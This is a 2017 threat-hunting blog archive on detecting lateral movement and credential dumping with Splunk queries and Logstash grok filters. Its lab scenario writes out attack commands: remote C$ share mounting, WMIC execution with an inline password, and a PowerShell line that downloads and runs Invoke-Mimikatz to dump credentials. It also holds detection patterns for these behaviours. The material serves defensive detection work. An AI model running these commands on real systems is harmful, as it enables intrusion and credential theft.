DFIR and Threat Hunting: December 2017

Earlier this year I talked a lot about behavior chains and how someone would go about implementing theses in Splunk. In my last post I also talked about a need to know the capabilities of your tools so that you can take full advantage of them. I wanted to do something a little different with this post. I know that many of you are using an ELK stack today for hunting or daily ops and it’s one of the areas where I lack experience. I decided to dig into ELK and see if it was possible to surface events of interest and begin to chain them together. In this post I’m going to document what I’ve accomplished so far in the hopes that it may spur some ideas.

Before we begin, here’s an overly simplistic view of how I went about chaining behaviors in Splunk:

Write queries for all actions that an attacker may take (regardless of volume that’s produced).
Schedule queries to be ran routinely.
Log all results of queries to separate index.
Query separate index for multiple events by user/src/dest within specified timeframe.

Getting started, I first went about configuring Elasticsearch to consume logs being sent from Winlogbeat. I applied the same log sources from the same virtual machines. Once my logs were flowing I began to experiment with Kibana and the query language. I was able to query for many of the behaviors that I was able to in Splunk. The exceptions would be those that are correlating multiple events by time. Here would be an example of what I would like to accomplish with ELK:

sourcetype=wineventlog:security EventCode=5145 Object_Type=File Share_Name=*$ (Access_Mask=0x100180 OR Access_Mask=0x80 OR Access_Mask=0x130197) |bucket span=1s _time |rex "(?<thingtype>(0x100180|0x80|0x130197))" |stats values(Relative_Target_Name) AS Relative_Target_Name, values(Account_Name) AS Account_Name, values(Source_Address) AS Source_Address, dc(thingtype) AS distinct_things by ComputerName, _time |search distinct_things=3

The above query will try to identify 3 logs with event id's 5145 and an access mask of either 0x100180, 0x80 or 0x130197 and all generated within the same second. This would be indicative of a file being copied to a $ share from a command prompt. Unfortunately, after banging my head against a wall for an entire weekend, I have not found a way to do this with Kibana or Elasticsearch.

Realizing that Kibana and Elasticsearch probably wouldn't get me to where I wanted to be I decided to see what I could do with Logstash (I was putting this off simply because I didn’t have it installed). My goal was to still be able to group events and start chaining them together. I found that Logstash has a cool feature to help with this. The ability to tag events with unique identifiers. My thought for this was to use the tagging method as a replacement for the separate index. By tagging events that I’m interested in I can start grouping them by time. I would also have an easy method to dive directly into logs of interest as they would include that tag that I could pivot on. To begin doing this I first needed to define the things that I’m interested in so I created a file with the below regular expressions that can be used in Grok filters.

# Event Codes

PROCSTART (\s*(4688)\s*)

EXPLICITLOGIN (\s*(4648)\s*)

FILESHARE (\s*(5145)\s*)

SHAREPATH (\s*(5140)\s*)

# Access masks found in various windows security event logs

ACCESSMASK12019F (\s*(0x12019f)\s*)

ACCESSMASK1 (\s*(0x1)\s*)

# Specific expressions related to lateral movement

SHARENAME (\\\\C$|\\\\c$|\\\\ADMIN$|\\\\admin$|\\\\IPC$|\\\\ipc$)

RELATIVETARGETNAME (srvsvc)

SYSMONCLISHARE ((CommandLine)[:]{1}.*?(c\$|C\$|admin\$|ADMIN\$))

SYSMONCLIIPV4 ((CommandLine)[:]{1}.*?(?<![0-9])(?:(?:[0-1]?[0-9]{1,2}|2[0-4][0-9]|25[0-5])[.](?:[0-1]?[0-9]{1,2}|2[0-4][0-9]|25[0-5])[.](?:[0-1]?[0-9]{1,2}|2[0-4][0-9]|25[0-5])[.](?:[0-1]?[0-9]{1,2}|2[0-4][0-9]|25[0-5]))(?![0-9]))

# Suspicious Executions

PSWEBREQUEST ((CommandLine)[:]{1}.*?(://))

WMICEXEC ((CommandLine)[:]{1}.*?(wmic|WMIC).*?i(?<![0-9])(?:(?:[0-1]?[0-9]{1,2}|2[0-4][0-9]|25[0-5])[.](?:[0-1]?[0-9]{1,2}|2[0-4][0-9]|25[0-5])[.](?:[0-1]?[0-9]{1,2}|2[0-4][0-9]|25[0-5])[.](?:[0-1]?[0-9]{1,2}|2[0-4][0-9]|25[0-5]))(?![0-9]).*?(process)\s*(call)\s*(create))

Making use of Grok filters, I simply want to match patterns in logs.

input {

beats {

port => 5044

host => "0.0.0.0"

}

filter {

if [type] == "wineventlog" {

grok {

patterns_dir => [ "/etc/logstash/patterns" ]

match => { "message" => "%{SUSPICIOUSPROCESSNAME:SPNAME}" }

add_tag => ["Correlation_Suspicious_Process_Start"]

}

filter {

if [type] == "wineventlog" {

grok {

patterns_dir => [ "/etc/logstash/patterns" ]

match => { "event_id" => "%{FILESHARE:ECODE}" }

match => { "message" => "%{RELATIVETARGETNAME:RTN}" }

match => { "message" => "%{ACCESSMASK12019F:AM}" }

match => { "message" => "${SHARENAME:SHARE}" }

add_tag => ["Correlation_Share_Enumeration"]

}

filter {

if [type] == "wineventlog" {

grok {

patterns_dir => [ "/etc/logstash/patterns" ]

match => { "message" => "%{SYSMONCLIIPV4:CLI}" }

add_tag => ["Correlation_IP_Sysmon_CLI"]

}

filter {

if [type] == "wineventlog" {

grok {

patterns_dir => [ "/etc/logstash/patterns" ]

match => { "message" => "%{SYSMONCLISHARE:CLISHARE}" }

add_tag => ["Correlation_Sysmon_Dollar_Share_CLI"]

}

filter {

if [type] == "wineventlog" {

grok {

patterns_dir => [ "/etc/logstash/patterns" ]

match => { "message" => "%{PSWEBREQUEST:CLIWEB}" }

add_tag => ["Correlation_HTTP_in_PS_Command"]

}

filter {

if "beats_input_codec_plain_applied" in [tags] {

mutate {

remove_tag => ["beats_input_codec_plain_applied"]

}

filter {

if "_grokparsefailure" in [tags] {

mutate {

remove_tag => ["_grokparsefailure"]

}

output {

elasticsearch { hosts => ["192.168.56.50:9200"] }

stdout { codec => rubydebug }

}

When a pattern is found I will then tag the log with Correlation_(meaningful name). I can then focus attention on logs that are tagged with Correlation.

Using the commands from my last few blog posts as an example, we can see what the output would look like.

net use z: \\192.168.56.10\c$ /user:admin1
copy bad.bat z:\temp\bad.bat
wmic /node:”192.168.56.10” /user:”pwned.com\admin1” /password:”Th1sisa-Test” process call create “cmd.exe /c c:\temp\bad.bat”
copy z:\bad.temp .\bad.temp

And a little snippet of some logs that were captured by the above filters.

This is all still a work in progress and has not been tested other than in a lab. My main goal for this is to gain some knowledge around other logging solutions and if there are ways that I can improve what I am doing today. My next step is to begin piping this data into neo4j which I think has a lot of potential for finding unknown relationships in these logs of interest. If you have any thoughts, suggestions or recommendations, I would live to hear them.

In my last post I talked a lot about how I think about finding bad guys. From creating mind maps of the things I should be looking for to the need for moving beyond simple IOC based detection and into more of a dynamic environment where alerts are clusters of events that are linked by time, source / destination / user. I also described a simple scenario of the actions that an attacker could take to dump credentials on a host and how those actions would map across the needs of an adversary. In this post I want to focus less on the thinking aspect and more on the doing.

To recap the scenario from my last post:

Attacker mounts C$ share on a remote machine
Attacker copies malicious batch script to the mapped share
Attacker issues wmic command to execute batch script on remote machine
Batch script executes powershell that will download and execute invoke-mimikatz
File that is created with the output of invoke-mimikatz is copied from mounted share to local filesystem.

The above actions taken by the attacker would fall into the maps under the following:

Need	Action
Authentication	Network Logon: Mounting Share
Data Movement	Admin Shares: Copy .bat script
Execution	WMIC: Execute against remote machines
Authentication	Rare Explicit logon
Data Movement	HTTP: Download of tool
Credential	DLL Loading
Execution	Powershell: Command Arguments
Data Movement	Copy: Dump File

The following are the commands that were executed:

net use z: \\192.168.56.10\c$ /user:admin1
copy bad.bat z:\temp\bad.bat
wmic /node:”192.168.56.10” /user:”pwned.com\admin1” /password:”Th1sisa-Test” process call create “cmd.exe /c c:\temp\bad.bat”
copy z:\bad.temp .\bad.temp

Based on the above command sequence, what are some questions that you would ask as a result?

When admins administer remote servers, do they typically use cmd.exe/wmic.exe/powershell.exe to issue commands or do they use some type of remote desktop solution the majority of the time?
When admins administer remote servers do they typically use ip addresses in their commands instead of hostnames?
What is the volume of remote logins from this source machine?
What is the volume of remote logins from this user?
How often has this source machine mounted the C$ share on a remote machine?
How often has this user mounted the C$ share on a remote machine?
How often has the destination machine had the C$ share mounted?
How often is the copy command used to copy batch scripts to the C$ share of a remote machine?
Is it common for an admin to use WMIC to connect to and issue commands on a remote machine?
If the majority of these are common practice in your environment, is this cluster of events common?

Below are the contents of bad.bat and the same question applies. What are some of the things you could key off of in order to possibly build some detection?

@echo off

powershell.exe “IEX (New-Object Net.WebClient).Downloadstring(‘http://192.168.56.20/web/Invoke-Mimikatz.ps1'); Invoke-Mimikatz -DumpCreds" >> c:\bad.temp

How often does powershell initiate a web request?
Have we seen a command like this in the past?
Have we seen the destination web server previously in a powershell command?
How can we tell if Invoke-Mimikatz was executed?

This is good. We have several things that we can go after to begin to build out some behavioral based detection. As we start creating queries for the above, keep in mind that you may need to use multiple log sources. If this is the case do yourself a favor and try to normalize the fields. It’s much easier to pivot and correlate across log sources when the fields are the same.

The obvious next step in our process would be to start building the queries out, but before we begin with that we need to understand our infrastructure, how these queries may perform and if there will be any impact as a result of scheduling these to run regularly. I have had the displeasure of working on some systems in the past where the query would have taken longer to run than the needed time span in scheduling. If this is the case, is there anything you can do to streamline your searches? Strictly speaking about Splunk, there is a method to create data models from log sourcetypes. The result of this is a dramatic increase of speed when building complex queries that look across large amounts of data. It may be worth investigating the tool you are working with to see if there is a similar option.

Also keep in mind that the above is just one single action that could be taken by an attacker during an intrusion. If these actions were part of an active intrusion there would likely be many more opportunities for detection. The queries that we will be creating are building blocks that can be used to start surfacing behaviors. These building blocks are likely valid for many other behaviors that may be taken during the course of an intrusion. The more building blocks you have the better your visibility into behaviors becomes. The more log sources that are queried and used for building blocks the more context your alerts will have. By clustering these building blocks and identifying the anomalous (actions, src, dest, user) you have a very good chance of spotting what otherwise may have been missed.

For these examples I’m using Windows event logs and Sysmon logs because that is what I have logging in my lab. I know that company logging policies and standards are all over the place or even non existent. Detection and logging tools are different. These examples won’t match what your environment looks like. The trick is to determine what you can detect with the log sources and the tools you have available. Detection and hunting is not easy. Know your tools as well as your data and be creative in how you go about hunting for bad guys. It’s an art!

I know that not everyone who will be reading this is a Splunk user, so I'm including key items that you can look for in your logs, but not the specific queries. If there is enough people asking I may include them in a separate blog post.

4624 Type 3 Logon

As adversaries move around your network they will often use builtin windows tools for this, such as “net” commands. These commands will generate a 4624 Type 3 network logon. Attackers will also likely stray from normal logon patterns within your environment. Logon times, users and src/dest combinations may look different. By looking for rare combinations where there is a remote IP address you may be able to reduce some of the noise while still identifying those events that should be investigated.

Log Source: Windows Security Events

EventCode=4624

LogonType=3

Account_Name!=*$

Workstation_Name!=“"

Command line with ip

If you have command line process audit logging within your environment it may be useful to determine how your admins administer remote machines. Do they typically connect to them by IP address or hostname. By knowing what is normal within your network, it is much easier to develop queries that will surface the abnormal.

Log Source: Sysmon

Regex CommandLine="[0-9]{1,3}\.[0-9]{1,3}\.[0-9]{1,3}\.[0-9]{1,3}”

C$ share identified in command line

Using windows shares is an easy way for an attacker to move data around. Whether it’s tools that have been brought in, or data intended for exfiltration. Pay attention to machines and users accessing hidden shares. Is this a rare occurrence for this machine/user or combination of both? Also pay attention to the process responsible for accessing the share and what the action is.

Log Source: Sysmon

CommandLine=*$\\*

HTTP request via powershell

This goes along with knowing your environment. Is it normal for powershell to invoke a web request? If the answer is yes, are the destinations unique? By looking for unique destinations that were the result of powershell invoking a web request you have a high likelihood of spotting a malicious command.

Log Source: Sysmon

CommandLine=“*://*”

Process=powershell.exe

Data movement dest to source

Similar to the $ share behavior. Whether it’s tools that have been brought in, or data intended for exfiltration. Pay attention to machines and users accessing hidden shares and the data that is passed between them. Is this a rare occurrence for this machine/user or combination of both?

Log Source: Windows Security Events

Object_Type=File

Share_Name=*$

EventCode=5145

(Access_Mask=0x100081

Access_Mask=0x80

Access_Mask=0x120089) within 1 second

Data movement source to dest

Log Source: Windows Security Events

EventCode=5145

Object_Type=File

Share_Name=*$

(Access_Mask=0x100180

Access_Mask=0x80

Access_Mask=0x130197) within 1 second

Remote WMIC

Execution is an attacker need. We’ve already said that attackers will often use windows tools when moving laterally within your network and wmic can be a method that an attacker can use to execute commands on a remote machine. Pay attention to source/dest/user combinations and the processes that are spawned on the remote machine. This query is intended to identify the processes that are spawned within 1 second of wmiprvse executing on the destination side of the wmic command. This query will also attempt to identify the source of the wmic connection.

Log Source: Windows Security Events

EventCode=4688

Process=wmiprvse.exe

Sub Search

EventCode=4624

LogonType=3

Source_Network_Address!=“”

Display source address and all processes spawned in that 1 second span.

WMIC 4648 login

Execution is an attacker need. We’ve already said that attackers will often use windows tools when moving laterally within your network and wmic can be a method that an attacker can use to execute commands on a remote machine. By monitoring explicit logons you can identify users, machines and processes that were used which resulted in an authentication to a remote machine. This query watches for processes that may often be used during lateral movement.

Log Source: Windows Security Events

EventCode=4648

(Process_Name=net.exe

Process_Name=wmic.exe

Process_Name=powershell.exe)

Account_Name!=“-“

Target_Server_Name!=localhost

Target_Server_Name!=*$

Process spawned from cmd.exe

Cmd.exe is probably the most executed process by an attacker during KC7. Monitor child processes and identify those clusters that may be related to malicious execution.

Log Source: Sysmon

ParentCommandLine=*cmd*

Mounting remote $ share

Log Source: Windows Security Events

Event Code=5140

Share_Name=*$

Access_Mask=0x1

Account_Name!=*$

Possible credential dumper execution

Attackers need credentials if they are going to move laterally. Identifying the potential execution of a credential dumper is important as they can often be missed by AV. This query looks at the loading of dll’s by process and identifies those that have the clusters often used together by various credential dumping tools.

Log Source: Sysmon

(ImageLoaded=wdigest.dll

ImageLoaded=kerberos.dll

ImageLoaded=tspkg.dll

ImageLoaded=sspicli.dll

ImageLoaded=samsrv.dll

ImageLoaded=secur32.dll

ImageLoaded=samlib.dll

ImageLoaded=wlanapi.dll

ImageLoaded=vaultcli.dll

ImageLoaded=crypt32.dll

ImageLoaded=cryptdll.dll

ImageLoaded=netapi.dll

ImageLoaded=netlogon.dll

ImageLoaded=msv1_0.dll) > 2 by process

Our next step would be to begin correlating the results of these queries, but unfortunately with using a Splunk free license, the ability to generate alerts will expire after 30 days. The alerts are needed in order to log the output of your queries to a separate index from which we would be doing our correlation. I have previously blogged about using queries such as the above and building correlation around them. This post can be found here: http://findingbad.blogspot.com/2017/02/hunting-for-chains.html.

The above queries are the building blocks that will be used as part of a more dynamic behavioral based detection methodology. As you continue to build out and correlate queries based on actions that adversaries take, the more your capability increases in finding previously undetected TTP’s.

I wasn't able to include screenshots of each query as the post, I believe, exceeded the maximum size. I am including a couple screenshots of the results of the queries though. If these queries were correlated into a single alert it should paint a pretty good picture that this is very bad.

DFIR and Threat Hunting

Saturday, December 30, 2017

Hunting with ELK

Friday, December 8, 2017

A Few of My Favorite Things - Continued